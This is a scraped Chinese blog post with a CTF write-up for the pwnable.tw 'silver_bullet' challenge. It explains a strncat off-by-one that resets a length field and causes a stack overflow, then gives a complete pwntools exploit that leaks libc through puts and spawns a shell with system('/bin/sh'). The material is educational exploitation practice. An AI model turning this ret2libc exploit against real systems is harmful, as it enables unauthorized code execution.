zoukankan      html  css  js  c++  java

  • pwnable.tw silver_bullet

    产生漏洞的原因

    int __cdecl power_up(char *dest)
{
  char s; // [esp+0h] [ebp-34h]
  size_t new_len; // [esp+30h] [ebp-4h]

  new_len = 0;
  memset(&s, 0, 0x30u);
  if ( !*dest )
    return puts("You need create the bullet first !");
  if ( *((_DWORD *)dest + 12) > 47u )           // len>47
    return puts("You can't power up any more !");
  printf("Give me your another description of bullet :");
  read_input(&s, 48 - *((_DWORD *)dest + 12));
  strncat(dest, &s, 48 - *((_DWORD *)dest + 12));// strncat会在dest结尾添加结束符,而记录字符串长度的位置正好位于s+0x30的位置,
                                                // s+0x30在strncat添加字符串长度为0x30时会被覆盖为0
  new_len = strlen(&s) + *((_DWORD *)dest + 12);// s+0x30被覆盖为0后new_len变为附加字符串的长度
  printf("Your new power is : %u
", new_len);
  *((_DWORD *)dest + 12) = new_len;
  return puts("Enjoy it !");
}

    脚本

    from pwn import *

    context.log_level='DEBUG'


    r=remote('chall.pwnable.tw',10103)
    file=ELF('./silver_bullet')
    libc=ELF('./libc_32.so.6')
    '''
    r=process('./silver_bullet')
    file=ELF('./silver_bullet')
    libc=ELF('/lib/i386-linux-gnu/libc-2.28.so')
    '''

    #trigger stack overflow
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Give me your description of bullet :')
    r.send('a'*47)
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    r.send('b')
    #gdb.attach(r)

    #leak libc
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    start=0x080484F0
    payload='xff'*3+p32(0xdeadbeaf)+p32(file.plt['puts'])+p32(start)+p32(file.got['puts'])
    payload+=(47-len(payload))*'a'
    r.send(payload)
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('Oh ! You win !!
')
    libc_base=u32(r.recv(4))-libc.sym['puts']
    success('libc_base:'+hex(libc_base))
    sys_addr=libc_base+libc.sym['system']
    binsh_addr=libc_base+libc.search('/bin/sh').next()
    success('binsh_addr'+hex(binsh_addr))
    #gdb.attach(r)

    #trigger stack overflow again
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Give me your description of bullet :')
    r.send('a'*47)
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    r.send('b')

    #trigger system('/bin/sh') call
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    payload1='xff'*3+p32(0xdeadbeaf)+p32(sys_addr)+p32(0xdeadbeaf)+p32(binsh_addr)
    payload1+=(47-len(payload))*'a'
    r.send(payload1)
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('Oh ! You win !!
')
    r.interactive()
  • 相关阅读:
    手游营销的10个靠谱方向
    创业三个月总结---记录这三个月的酸甜苦辣咸!!!
    创业三个月总结---记录这三个月的酸甜苦辣咸!!!
    Notepad++ 删除空白行的方法
    Notepad++ 删除空白行的方法
    几种常见容器比较和分析 hashmap, map, vector, list ...hash table
    hdu 3371
    hdu 1879
    hdu 1875
    hdu 1863
  • 原文地址:https://www.cnblogs.com/snip3r/p/10628682.html
Copyright © 2011-2022 走看看